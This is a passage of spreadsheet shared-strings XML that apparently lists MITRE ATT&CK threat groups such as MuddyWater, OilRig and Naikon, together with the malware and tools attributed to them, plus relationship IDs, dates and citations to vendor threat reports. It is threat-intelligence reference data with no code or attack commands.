    <t>relationship--41b74267-f604-4581-b1ca-4f1907a82245</t>
  </si>
  <si>
    <t>S0062</t>
  </si>
  <si>
    <t>DustySky</t>
  </si>
  <si>
    <t>malware--687c23e4-4e25-4ee7-a870-c5e002511f54</t>
  </si>
  <si>
    <t>(Citation: DustySky)(Citation: DustySky2)(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>relationship--3cdc74fc-a291-4253-98b4-ca33e021914a</t>
  </si>
  <si>
    <t>S0553</t>
  </si>
  <si>
    <t>MoleNet</t>
  </si>
  <si>
    <t>malware--8a59f456-79a0-4151-9f56-9b1a67332af2</t>
  </si>
  <si>
    <t xml:space="preserve">(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t>relationship--049d2b7e-fb1e-4bf3-bf2f-97197e40bda2</t>
  </si>
  <si>
    <t>(Citation: DustySky)(Citation: DustySky2)(Citation: FireEye Operation Molerats)</t>
  </si>
  <si>
    <t>relationship--fad44d26-02a8-4cdc-b566-5e24f32a93b3</t>
  </si>
  <si>
    <t>S0546</t>
  </si>
  <si>
    <t>SharpStage</t>
  </si>
  <si>
    <t>malware--0ba9281c-93fa-4b29-8e9e-7ef918c7b13a</t>
  </si>
  <si>
    <t>relationship--8f321c37-1463-4b55-a3d5-f2e517ede0b7</t>
  </si>
  <si>
    <t>S0543</t>
  </si>
  <si>
    <t>Spark</t>
  </si>
  <si>
    <t>malware--03ea629c-517a-41e3-94f8-c7e5368cf8f4</t>
  </si>
  <si>
    <t>(Citation: Unit42 Molerat Mar 2020) (Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>relationship--0dd7e88b-aeea-4b14-a06c-becaa94f8bba</t>
  </si>
  <si>
    <t>15 December 2020</t>
  </si>
  <si>
    <t>G1009</t>
  </si>
  <si>
    <t>Moses Staff</t>
  </si>
  <si>
    <t>intrusion-set--4c4a7846-45d5-4761-8eea-725fa989914c</t>
  </si>
  <si>
    <t>S1033</t>
  </si>
  <si>
    <t>DCSrv</t>
  </si>
  <si>
    <t>malware--5633ffd3-81ef-4f98-8f93-4896b03998f0</t>
  </si>
  <si>
    <t>(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>relationship--4d106c44-26fd-438b-99c4-6c2ce1bb1084</t>
  </si>
  <si>
    <t>11 August 2022</t>
  </si>
  <si>
    <t>relationship--335efe06-4f71-43cb-ab93-c812157d0078</t>
  </si>
  <si>
    <t>S1032</t>
  </si>
  <si>
    <t>PyDCrypt</t>
  </si>
  <si>
    <t>malware--2ac41e8b-4865-4ced-839d-78e7852c47f3</t>
  </si>
  <si>
    <t>relationship--0ff5be0c-a9f8-4c21-9100-4033878be61e</t>
  </si>
  <si>
    <t>S1034</t>
  </si>
  <si>
    <t>StrifeWater</t>
  </si>
  <si>
    <t>malware--fb78294a-7d7a-4d38-8ad0-92e67fddc9f0</t>
  </si>
  <si>
    <t>(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>relationship--610421e6-aa2f-4756-817b-57458e4959ad</t>
  </si>
  <si>
    <t>15 August 2022</t>
  </si>
  <si>
    <t>G1019</t>
  </si>
  <si>
    <t>MoustachedBouncer</t>
  </si>
  <si>
    <t>intrusion-set--7251b44b-6072-476c-b8d9-a6e32c355b28</t>
  </si>
  <si>
    <t>S1088</t>
  </si>
  <si>
    <t>Disco</t>
  </si>
  <si>
    <t>malware--e1445afd-c359-45ed-8f27-626dc4d5e157</t>
  </si>
  <si>
    <t>(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--c74c6674-047a-401a-8a70-0d96d7cf243a</t>
  </si>
  <si>
    <t>26 September 2023</t>
  </si>
  <si>
    <t>S1090</t>
  </si>
  <si>
    <t>NightClub</t>
  </si>
  <si>
    <t>malware--91c57ed3-7c32-4c68-b388-7db00cb8dac6</t>
  </si>
  <si>
    <t>relationship--513d7a58-a595-4717-8377-ed144d0e2223</t>
  </si>
  <si>
    <t>S1089</t>
  </si>
  <si>
    <t>SharpDisco</t>
  </si>
  <si>
    <t>malware--1fefb062-feda-484a-8f10-0cebf65e20e3</t>
  </si>
  <si>
    <t>relationship--eb9993e7-25aa-42a7-9324-04ec08bb4372</t>
  </si>
  <si>
    <t>G0069</t>
  </si>
  <si>
    <t>MuddyWater</t>
  </si>
  <si>
    <t>intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2</t>
  </si>
  <si>
    <t>(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>relationship--abb544df-2ece-4007-b3c9-0708362875ed</t>
  </si>
  <si>
    <t>(Citation: TrendMicro POWERSTATS V3 June 2019)(Citation: Symantec MuddyWater Dec 2018)</t>
  </si>
  <si>
    <t>relationship--aa0e4bee-a9a4-4d32-bb62-f024058842c6</t>
  </si>
  <si>
    <t>29 July 2020</t>
  </si>
  <si>
    <t>(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>relationship--baec4c99-f8f9-4789-a73d-c6b652299048</t>
  </si>
  <si>
    <t>18 May 2020</t>
  </si>
  <si>
    <t>(Citation: Reaqta MuddyWater November 2017)(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>relationship--fd119308-f4b9-4d06-adf2-08a76baee7d9</t>
  </si>
  <si>
    <t>(Citation: Symantec MuddyWater Dec 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>relationship--97068a5a-faff-4212-a841-c06db163452e</t>
  </si>
  <si>
    <t>(Citation: Unit 42 MuddyWater Nov 2017)(Citation: TrendMicro POWERSTATS V3 June 2019)</t>
  </si>
  <si>
    <t>relationship--93642a19-cc8f-4298-9398-8d5d029fe53d</t>
  </si>
  <si>
    <t>S1047</t>
  </si>
  <si>
    <t>Mori</t>
  </si>
  <si>
    <t>malware--7e100ca4-e639-48d9-9a9d-8ad84aa7b448</t>
  </si>
  <si>
    <t>(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--92d7859a-14cd-46dc-80c2-821883d6bee4</t>
  </si>
  <si>
    <t>S0594</t>
  </si>
  <si>
    <t>Out1</t>
  </si>
  <si>
    <t>tool--80c815bb-b24a-4b9c-9d73-ff4c075a278d</t>
  </si>
  <si>
    <t>(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>relationship--3574efdf-c9f0-4515-806e-a9a5437be02a</t>
  </si>
  <si>
    <t>19 March 2021</t>
  </si>
  <si>
    <t>S0223</t>
  </si>
  <si>
    <t>POWERSTATS</t>
  </si>
  <si>
    <t>malware--e8545794-b98c-492b-a5b3-4b5a02682e37</t>
  </si>
  <si>
    <t>(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater June 2019)</t>
  </si>
  <si>
    <t>relationship--31433bb4-aa47-444a-b7d7-49208401e974</t>
  </si>
  <si>
    <t>S1046</t>
  </si>
  <si>
    <t>PowGoop</t>
  </si>
  <si>
    <t>malware--c19d19ae-dd58-4584-8469-966bbeaa80e3</t>
  </si>
  <si>
    <t>relationship--a24d8806-1c55-4ca7-bb83-1915655d914f</t>
  </si>
  <si>
    <t>relationship--649748ff-e2d0-4369-8f5d-3c8b5b5010ed</t>
  </si>
  <si>
    <t>S0592</t>
  </si>
  <si>
    <t>RemoteUtilities</t>
  </si>
  <si>
    <t>tool--03c6e0ea-96d3-4b23-9afb-05055663cf4b</t>
  </si>
  <si>
    <t>relationship--d9346357-5c7a-4df3-998f-3ca6866bf877</t>
  </si>
  <si>
    <t>S0450</t>
  </si>
  <si>
    <t>SHARPSTATS</t>
  </si>
  <si>
    <t>malware--73c4711b-407a-449d-b269-e3b1531fe7a9</t>
  </si>
  <si>
    <t>relationship--b9decd90-60fa-4edc-b428-70e94d6d8207</t>
  </si>
  <si>
    <t>S1037</t>
  </si>
  <si>
    <t>STARWHALE</t>
  </si>
  <si>
    <t>malware--e355fc84-6f3c-4888-8e0a-d7fa9c378532</t>
  </si>
  <si>
    <t>relationship--124c87a2-d58e-4d46-910c-afa352d384c5</t>
  </si>
  <si>
    <t>S1035</t>
  </si>
  <si>
    <t>Small Sieve</t>
  </si>
  <si>
    <t>malware--ff41b9b6-4c1d-407b-a7e2-835109c8dbc5</t>
  </si>
  <si>
    <t>(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: NCSC GCHQ Small Sieve Jan 2022)</t>
  </si>
  <si>
    <t>relationship--8911df73-17ac-430b-b1d5-3a021bc64998</t>
  </si>
  <si>
    <t>16 August 2022</t>
  </si>
  <si>
    <t>G0129</t>
  </si>
  <si>
    <t>Mustang Panda</t>
  </si>
  <si>
    <t>intrusion-set--420ac20b-f2b9-42b8-aa1a-6d4b72895ca4</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Recorded Future REDDELTA July 2020)(Citation: McAfee Dianxun March 2021)</t>
  </si>
  <si>
    <t>relationship--43924791-6149-4869-a30c-0cad37d1e6f6</t>
  </si>
  <si>
    <t>(Citation: Secureworks BRONZE PRESIDENT December 2019)</t>
  </si>
  <si>
    <t>relationship--d63355e9-94d1-4eb2-b24d-d8c8b11923ef</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</si>
  <si>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</si>
  <si>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relationship--fc7c27b4-e18f-486a-b7f8-9eb61eec23f2</t>
  </si>
  <si>
    <t>16 March 2022</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Recorded Future REDDELTA July 2020)</t>
  </si>
  <si>
    <t>relationship--d6fb17bf-df52-4eff-b669-c5b77c13e26c</t>
  </si>
  <si>
    <t>S0662</t>
  </si>
  <si>
    <t>RCSession</t>
  </si>
  <si>
    <t>malware--03acae53-9b98-46f6-b204-16b930839055</t>
  </si>
  <si>
    <t>relationship--d395d0b1-0ce7-46bf-bf8a-5a031f7bbf78</t>
  </si>
  <si>
    <t>G0055</t>
  </si>
  <si>
    <t>NEODYMIUM</t>
  </si>
  <si>
    <t>intrusion-set--025bdaa9-897d-4bad-afa6-013ba5734653</t>
  </si>
  <si>
    <t>S0176</t>
  </si>
  <si>
    <t>Wingbird</t>
  </si>
  <si>
    <t>malware--a8d3d497-2da9-4797-8e0b-ed176be08654</t>
  </si>
  <si>
    <t>(Citation: Microsoft NEODYMIUM Dec 2016)(Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>relationship--877a67b0-5dea-467c-9da1-8eee3bcc19a6</t>
  </si>
  <si>
    <t>G0019</t>
  </si>
  <si>
    <t>Naikon</t>
  </si>
  <si>
    <t>intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050</t>
  </si>
  <si>
    <t>S0456</t>
  </si>
  <si>
    <t>Aria-body</t>
  </si>
  <si>
    <t>malware--3161d76a-e2b2-4b97-9906-24909b735386</t>
  </si>
  <si>
    <t>(Citation: CheckPoint Naikon May 2020)(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--fd8fa359-c13e-4641-9c3e-d03218daee0c</t>
  </si>
  <si>
    <t>26 May 2020</t>
  </si>
  <si>
    <t>29 June 2021</t>
  </si>
  <si>
    <t>S0061</t>
  </si>
  <si>
    <t>HDoor</t>
  </si>
  <si>
    <t>malware--007b44b6-e4c5-480b-b5b9-56f2081b1b7b</t>
  </si>
  <si>
    <t>(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>relationship--8119ee71-e017-4ba0-9aeb-a14c46f64f1a</t>
  </si>
  <si>
    <t>S0630</t>
  </si>
  <si>
    <t>Nebulae</t>
  </si>
  <si>
    <t>malware--22b17791-45bf-45c0-9322-ff1a0af5cf2b</t>
  </si>
  <si>
    <t>(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--789b89f3-0f5e-4e3d-92fd-76611e840947</t>
  </si>
  <si>
    <t>30 June 2021</t>
  </si>
  <si>
    <t>(Citation: Baumgartner Naikon 2015)(Citation: Bitdefender Naikon April 2021)</t>
  </si>
  <si>
    <t>relationship--0ef9bb79-c221-40a8-94b0-58bfc816565f</t>
  </si>
  <si>
    <t>02 July 2021</t>
  </si>
  <si>
    <t>relationship--2a220ca3-88f4-40eb-8041-184c412950d4</t>
  </si>
  <si>
    <t>relationship--f08c1f67-485b-4ebd-81dd-e886f63025e6</t>
  </si>
  <si>
    <t>S0055</t>
  </si>
  <si>
    <t>RARSTONE</t>
  </si>
  <si>
    <t>malware--8c553311-0baa-4146-997a-f79acef3d831</t>
  </si>
  <si>
    <t>(Citation: Baumgartner Naikon 2015)(Citation: CameraShy)</t>
  </si>
  <si>
    <t>relationship--7dba7706-128e-43a7-a240-6d456c9003a2</t>
  </si>
  <si>
    <t>S0629</t>
  </si>
  <si>
    <t>RainyDay</t>
  </si>
  <si>
    <t>malware--29231689-5837-4a7a-aafc-1b65b3f50cc7</t>
  </si>
  <si>
    <t>relationship--6e625aae-d7d7-47a3-ba1a-8deca6321cdc</t>
  </si>
  <si>
    <t>S0058</t>
  </si>
  <si>
    <t>SslMM</t>
  </si>
  <si>
    <t>malware--2fb26586-2b53-4b9a-ad4f-2b3bcb9a2421</t>
  </si>
  <si>
    <t>relationship--af0b0bfb-1a1e-4a06-b9e9-adeda7b6ad81</t>
  </si>
  <si>
    <t>S0060</t>
  </si>
  <si>
    <t>Sys10</t>
  </si>
  <si>
    <t>malware--7f8730af-f683-423f-9ee1-5f6875a80481</t>
  </si>
  <si>
    <t>relationship--956303a4-558c-433d-bc2f-28a7e69192ae</t>
  </si>
  <si>
    <t>relationship--4b521c7b-c66b-4bbc-847e-d6a13e9ae62c</t>
  </si>
  <si>
    <t>relationship--f2d601c9-8cc7-4425-b76f-fbc9997b55fd</t>
  </si>
  <si>
    <t>S0059</t>
  </si>
  <si>
    <t>WinMM</t>
  </si>
  <si>
    <t>malware--22addc7b-b39f-483d-979a-1b35147da5de</t>
  </si>
  <si>
    <t>relationship--45966f4c-51d4-4940-854d-79d712f63ed5</t>
  </si>
  <si>
    <t>relationship--0ead6cee-20a4-46fb-a9c1-8686a776f455</t>
  </si>
  <si>
    <t>relationship--437dd20a-234f-430b-b9ee-4524e1e12aa9</t>
  </si>
  <si>
    <t>G0133</t>
  </si>
  <si>
    <t>Nomadic Octopus</t>
  </si>
  <si>
    <t>intrusion-set--fed4f0a2-4347-4530-b0f5-6dfd49b29172</t>
  </si>
  <si>
    <t>S0340</t>
  </si>
  <si>
    <t>Octopus</t>
  </si>
  <si>
    <t>malware--e2031fd5-02c2-43d4-85e2-b64f474530c2</t>
  </si>
  <si>
    <t xml:space="preserve">(Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018) </t>
  </si>
  <si>
    <t>relationship--0c9329e5-eb38-4887-b434-d6a3a69f2205</t>
  </si>
  <si>
    <t>24 August 2021</t>
  </si>
  <si>
    <t>G0049</t>
  </si>
  <si>
    <t>OilRig</t>
  </si>
  <si>
    <t>intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d</t>
  </si>
  <si>
    <t>S0360</t>
  </si>
  <si>
    <t>BONDUPDATER</t>
  </si>
  <si>
    <t>malware--d5268dfb-ae2b-4e0e-ac07-02a460613d8a</t>
  </si>
  <si>
    <t>(Citation: FireEye APT34 Dec 2017) (Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>relationship--978d8c12-bf39-440f-ac17-b66970451152</t>
  </si>
  <si>
    <t>18 February 2019</t>
  </si>
  <si>
    <t>18 March 2020</t>
  </si>
  <si>
    <t>S0170</t>
  </si>
  <si>
    <t>Helminth</t>
  </si>
  <si>
    <t>malware--eff1a885-6f90-42a1-901f-eef6e7a1905e</t>
  </si>
  <si>
    <t>(Citation: Palo Alto OilRig May 2016)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: Crowdstrike Helix Kitten Nov 2018)</t>
  </si>
  <si>
    <t>relationship--ae1de9c5-6bc0-459a-b4ca-568139a5ee41</t>
  </si>
  <si>
    <t>S0189</t>
  </si>
  <si>
    <t>ISMInjector</t>
  </si>
  <si>
    <t>malware--5be33fef-39c0-4532-84ee-bea31e1b5324</t>
  </si>
  <si>
    <t>(Citation: OilRig New Delivery Oct 2017)</t>
  </si>
  <si>
    <t>relationship--00c88cab-5cb9-492a-8dce-8eab92213bc3</t>
  </si>
  <si>
    <t>relationship--8b42462a-0d66-4740-8f48-0857ab523370</t>
  </si>
  <si>
    <t>(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: FireEye APT35 2018)</t>
  </si>
  <si>
    <t>relationship--e94576ee-284c-4782-a6ef-b7dd8a780254</t>
  </si>
  <si>
    <t>(Citation: Palo Alto OilRig May 2016)(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>relationship--3fb836b7-41cf-40d1-bd56-14e45e6bbd02</t>
  </si>
  <si>
    <t>S0264</t>
  </si>
  <si>
    <t>OopsIE</t>
  </si>
  <si>
    <t>malware--8e101fdd-9f7f-4916-bb04-6bd9e94c129c</t>
  </si>
  <si>
    <t>(Citation: Unit 42 OopsIE! Feb 2018)</t>
  </si>
  <si>
    <t>relationship--3127bcf3-3638-4c1b-9a95-156f6c78658a</t>
  </si>
  <si>
    <t>S0184</t>
  </si>
  <si>
    <t>POWRUNER</t>
  </si>
  <si>
    <t>malware--09b2cd76-c674-47cc-9f57-d2f2ad150a46</t>
  </si>
  <si>
    <t>(Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>relationship--52d3e8a9-8801-497f-b1e1-6d45e196c79b</t>
  </si>
  <si>
    <t>(Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>relationship--e1a3f5df-963d-4211-931e-02ed9c567168</t>
  </si>
  <si>
    <t>S0269</t>
  </si>
  <si>
    <t>QUADAGENT</t>
  </si>
  <si>
    <t>malware--7e6c2a9d-9dc1-4eb0-b27c-91e8076a9d77</t>
  </si>
  <si>
    <t>(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>relationship--1652bf3a-085a-4388-839a-04858b14affd</t>
  </si>
  <si>
    <t>S0495</t>
  </si>
  <si>
    <t>RDAT</t>
  </si>
  <si>
    <t>malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b</t>
  </si>
  <si>
    <t>(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>relationship--0783831d-da64-4bb3-a54e-c5149e7e0d76</t>
  </si>
  <si>
    <t>S0258</t>
  </si>
  <si>
    <t>RGDoor</t>
  </si>
  <si>
    <t>malware--b9eec47e-98f4-4b3c-b574-3fa8a87ebe05</t>
  </si>
  <si>
    <t>(Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>relationship--fa224c64-2157-4c2f-9f9c-451a3923cc42</t>
  </si>
  <si>
    <t>relationship--49404706-aa42-4914-a273-2eeb217e6477</t>
  </si>
  <si>
    <t>S0185</t>
  </si>
  <si>
    <t>SEASHARPEE</t>
  </si>
  <si>
    <t>malware--0998045d-f96e-4284-95ce-3c8219707486</t>
  </si>
  <si>
    <t>relationship--e2def7f8-7c68-4ed6-b801-260b24a67409</t>
  </si>
  <si>
    <t>S0610</t>
  </si>
  <si>
    <t>SideTwist</t>
  </si>
  <si>
    <t>malware--df4cd566-ff2f-4d08-976d-8c86e95782de</t>
  </si>
  <si>
    <t>(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>relationship--99ec87aa-5e07-4d47-8d29-6614850c88b5</t>
  </si>
  <si>
    <t>06 May 2021</t>
  </si>
  <si>
    <t>relationship--0e6d61e2-7b61-4b6c-85c7-7779125c1d14</t>
  </si>
  <si>
    <t>relationship--3beb0c09-e584-4fd8-92bb-d7a1ae9192e6</t>
  </si>
  <si>
    <t>relationship--431ec495-5f92-40e9-9955-58ca334ea3c8</t>
  </si>
  <si>
    <t>(Citation: Palo Alto OilRig Oct 2016)</t>
  </si>
  <si>
    <t>relationship--fd518b7a-b35d-4689-89f6-525efbeee18f</t>
  </si>
  <si>
    <t>(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>relationship--72d6fe7e-ba33-4117-8153-64226f189ed2</t>
  </si>
  <si>
    <t>relationship--5744b31d-6633-44ca-8170-17489fec124c</t>
  </si>
  <si>
    <t>G0071</t>
  </si>
  <si>
    <t>Orangeworm</t>
  </si>
  <si>
    <t>intrusion-set--5636b7b3-d99b-4edd-aa05-ee649c1d4ef1</t>
  </si>
  <si>
    <t>(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>relationship--cc6e0159-1216-4ca5-ac5c-55e961878785</t>
  </si>
  <si>
    <t>S0236</t>
  </si>
  <si>
    <t>Kwampirs</t>
  </si>
  <si>
    <t>malware--c2417bab-3189-4d4d-9d60-96de2cdaf0ab</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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G0068</t>
  </si>
  <si>
    <t>PLATINUM</t>
  </si>
  <si>
    <t>intrusion-set--f9c06633-dcff-48a1-8588-759e7cec5694</t>
  </si>
  <si>
    <t>S0200</t>
  </si>
  <si>
    <t>Dipsind</t>
  </si>
  <si>
    <t>malware--e170995d-4f61-4f17-b60e-04f9a06ee517</t>
  </si>
  <si>
    <t>(Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>relationship--6f6d6ccc-ac71-42b6-ab14-d02914d05717</t>
  </si>
  <si>
    <t>10 May 2019</t>
  </si>
  <si>
    <t>S0201</t>
  </si>
  <si>
    <t>JPIN</t>
  </si>
  <si>
    <t>malware--de6cb631-52f6-4169-a73b-7965390b0c30</t>
  </si>
  <si>
    <t>relationship--0b7d2d81-0d74-4365-a8ca-d70974c84a57</t>
  </si>
  <si>
    <t>S0202</t>
  </si>
  <si>
    <t>adbupd</t>
  </si>
  <si>
    <t>malware--0f1ad2ef-41d4-4b7a-9304-ddae68ea3005</t>
  </si>
  <si>
    <t>relationship--ebd51f84-cd09-4b40-88bd-bed2461996d7</t>
  </si>
  <si>
    <t>G1005</t>
  </si>
  <si>
    <t>POLONIUM</t>
  </si>
  <si>
    <t>intrusion-set--5f3d0238-d058-44a9-8812-3dd1b6741a8c</t>
  </si>
  <si>
    <t>S1023</t>
  </si>
  <si>
    <t>CreepyDrive</t>
  </si>
  <si>
    <t>malware--750eb92a-7fdf-451e-9592-1d42357018f1</t>
  </si>
  <si>
    <t>(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>relationship--0337777c-cfe7-4cfa-b1f0-4000d3c8244b</t>
  </si>
  <si>
    <t>S1024</t>
  </si>
  <si>
    <t>CreepySnail</t>
  </si>
  <si>
    <t>malware--d23de441-f9cf-4802-b1ff-f588a11a896b</t>
  </si>
  <si>
    <t>relationship--a3a4fbbe-3559-4333-8285-732a3dfa0460</t>
  </si>
  <si>
    <t>G0056</t>
  </si>
  <si>
    <t>PROMETHIUM</t>
  </si>
  <si>
    <t>intrusion-set--efed95ba-d7e8-47ff-8c53-99c42426ee7c</t>
  </si>
  <si>
    <t>S0491</t>
  </si>
  <si>
    <t>StrongPity</t>
  </si>
  <si>
    <t>malware--20945359-3b39-4542-85ef-08ecb4e1c174</t>
  </si>
  <si>
    <t>(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>relationship--bc4252e5-6a2a-443e-9a31-16d86f4f069b</t>
  </si>
  <si>
    <t>28 July 2020</t>
  </si>
  <si>
    <t>S0178</t>
  </si>
  <si>
    <t>Truvasys</t>
  </si>
  <si>
    <t>malware--691c60e2-273d-4d56-9ce6-b67e0f8719ad</t>
  </si>
  <si>
    <t>relationship--34ebfdf4-ef2c-4a6c-8bfa-69704d8f7694</t>
  </si>
  <si>
    <t>G0040</t>
  </si>
  <si>
    <t>Patchwork</t>
  </si>
  <si>
    <t>intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0</t>
  </si>
  <si>
    <t>(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>relationship--d0cd5f13-7e44-4728-98df-6e832f5d54dc</t>
  </si>
  <si>
    <t>11 July 2019</t>
  </si>
  <si>
    <t>S0128</t>
  </si>
  <si>
    <t>BADNEWS</t>
  </si>
  <si>
    <t>malware--e9595678-d269-469e-ae6b-75e49259de63</t>
  </si>
  <si>
    <t>(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--f1456e13-5f3f-4dac-a002-2bd78c36348a</t>
  </si>
  <si>
    <t>S0475</t>
  </si>
  <si>
    <t>BackConfig</t>
  </si>
  <si>
    <t>malware--c13d9621-aca7-436b-ab3d-3a95badb3d00</t>
  </si>
  <si>
    <t>(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>relationship--8b2625de-8de9-4216-8805-d1e75093b098</t>
  </si>
  <si>
    <t>S0272</t>
  </si>
  <si>
    <t>NDiskMonitor</t>
  </si>
  <si>
    <t>malware--d1183cb9-258e-4f2f-8415-50ac8252c49e</t>
  </si>
  <si>
    <t>(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>relationship--1ccf8b65-7f3e-4db7-933c-0a9bfae9602e</t>
  </si>
  <si>
    <t>(Citation: Cymmetria Patchwork)</t>
  </si>
  <si>
    <t>relationship--f07267d5-f532-4a52-abd6-20d5f94a2bf8</t>
  </si>
  <si>
    <t>02 November 2021</t>
  </si>
  <si>
    <t>(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>relationship--5d26097f-2d6a-4642-857b-109c0f600a73</t>
  </si>
  <si>
    <t>S0131</t>
  </si>
  <si>
    <t>TINYTYPHON</t>
  </si>
  <si>
    <t>malware--85b39628-204a-48d2-b377-ec368cbcb7ca</t>
  </si>
  <si>
    <t>relationship--9a35b72d-f238-4214-8bd1-91b768ab277b</t>
  </si>
  <si>
    <t>S0130</t>
  </si>
  <si>
    <t>Unknown Logger</t>
  </si>
  <si>
    <t>malware--ab3580c8-8435-4117-aace-3d9fbe46aa56</t>
  </si>
  <si>
    <t>relationship--f367b2fc-ea76-4fd4-9b90-049d95b4bc08</t>
  </si>
  <si>
    <t>G0011</t>
  </si>
  <si>
    <t>PittyTiger</t>
  </si>
  <si>
    <t>intrusion-set--fe98767f-9df8-42b9-83c9-004b1dec8647</t>
  </si>
  <si>
    <t>S0010</t>
  </si>
  <si>
    <t>Lurid</t>
  </si>
  <si>
    <t>malware--251fbae2-78f6-4de7-84f6-194c727a64ad</t>
  </si>
  <si>
    <t>(Citation: Villeneuve 2014)</t>
  </si>
  <si>
    <t>relationship--71416f0d-b037-48b2-a14d-acb1a5f3a4a4</t>
  </si>
  <si>
    <t>(Citation: Bizeul 2014)</t>
  </si>
  <si>
    <t>relationship--cc831c63-94af-4937-b8e6-668591ec7d04</t>
  </si>
  <si>
    <t>relationship--8d65162b-650d-4a38-9c19-cc6c8e85a2e9</t>
  </si>
  <si>
    <t>(Citation: Bizeul 2014)(Citation: Villeneuve 2014)</t>
  </si>
  <si>
    <t>relationship--3f780c76-b5d5-43f9-b4f2-048106f00894</t>
  </si>
  <si>
    <t>relationship--7ed93170-2dba-4e59-b0f0-7c716c73bdc0</t>
  </si>
  <si>
    <t>G0024</t>
  </si>
  <si>
    <t>Putter Panda</t>
  </si>
  <si>
    <t>intrusion-set--5ce5392a-3a6c-4e07-9df3-9b6a9159ac45</t>
  </si>
  <si>
    <t>S0066</t>
  </si>
  <si>
    <t>3PARA RAT</t>
  </si>
  <si>
    <t>malware--7bec698a-7e20-4fd3-bb6a-12787770fb1a</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>relationship--3b3435a2-6a24-4527-be6f-03d09ef2b917</t>
  </si>
  <si>
    <t>S0065</t>
  </si>
  <si>
    <t>4H RAT</t>
  </si>
  <si>
    <t>malware--8e461ca3-0996-4e6e-a0df-e2a5bbc51ebc</t>
  </si>
  <si>
    <t>relationship--47835d17-73e1-427f-85b0-b55b610fa9ad</t>
  </si>
  <si>
    <t>S0068</t>
  </si>
  <si>
    <t>httpclient</t>
  </si>
  <si>
    <t>malware--e8268361-a599-4e45-bd3f-71c8c7e700c0</t>
  </si>
  <si>
    <t>relationship--c6ceeb68-5d8e-4105-a20a-cce2b3ef48f0</t>
  </si>
  <si>
    <t>S0067</t>
  </si>
  <si>
    <t>pngdowner</t>
  </si>
  <si>
    <t>malware--800bdfba-6d66-480f-9f45-15845c05cb5d</t>
  </si>
  <si>
    <t>relationship--0cde085d-12ca-4cde-a99c-c37d63d7dc2e</t>
  </si>
  <si>
    <t>G0048</t>
  </si>
  <si>
    <t>RTM</t>
  </si>
  <si>
    <t>intrusion-set--c416b28c-103b-4df1-909e-78089a7e0e5f</t>
  </si>
  <si>
    <t>S0148</t>
  </si>
  <si>
    <t>malware--92ec0cbd-2c30-44a2-b270-73f4ec949841</t>
  </si>
  <si>
    <t>(Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>relationship--9755e169-0dd5-4bf5-a884-d50d31f33ad9</t>
  </si>
  <si>
    <t>G0075</t>
  </si>
  <si>
